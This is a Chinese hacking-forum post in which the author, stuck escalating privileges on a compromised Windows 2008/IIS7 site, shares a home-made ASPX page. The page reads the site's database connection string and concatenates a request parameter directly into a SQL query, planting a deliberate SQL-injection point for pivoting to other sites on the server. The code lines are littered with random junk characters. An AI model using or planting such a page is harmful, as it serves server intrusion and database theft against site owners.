利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
9 `1 g: L0 u8 C5 m其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。

1 N  D; U$ A2 U" l' A/ |​
! z0 n% h6 i7 L) d; k( Z! Z: |<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
9 }/ i) t& A* _; a  ~3 M3 h3 g# Q<html xmlns="http://www.w3.org/1999/xhtml">
4 F0 a: Z9 Y  M0 {/ d: v; y; u) t( h) S( P<head runat="server">
# M2 F, R" m- i8 M    <title>暗影aspx构造注射专用页面</title>
$ K8 m1 ?' x1 Y; K: W</head>
( p# H- V4 `+ v' b<body>
    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
            
* B. a. d5 L: V+ E: U% k         void page_init(object sender, EventArgs e)
         {
9 Q. W1 _: j$ L$ x: K            
% I* q9 {6 p; g0 _  r             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
  a/ r. U: ?! X+ y, B9 t4 q7 U            
" w4 V; X. @$ `  g/ H" q             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
* j. X/ i" Z2 r' i             conn.Open();
5 n1 \$ D, H$ ^$ f! H: A. p3 v            
& Z6 k- Y+ G9 Y+ b$ H             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
" x3 q- n( ^6 x             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
5 E! h- T, _) \8 N: w7 ]8 U             Response.Write(i+"\n");
             Response.Write(x);
             conn.Close();
: K; T7 N$ c- o3 Q# f         }
" i" h8 ?4 z+ @. s+ n     
" {6 Z7 ?" Q" M6 m  </script>
5 f4 v( Q$ D# R4 [5 F& f- ^    </div>
    </form>
</body>
</html>
) k# V4 _- G  E/ ~% O  Y% _1 v, u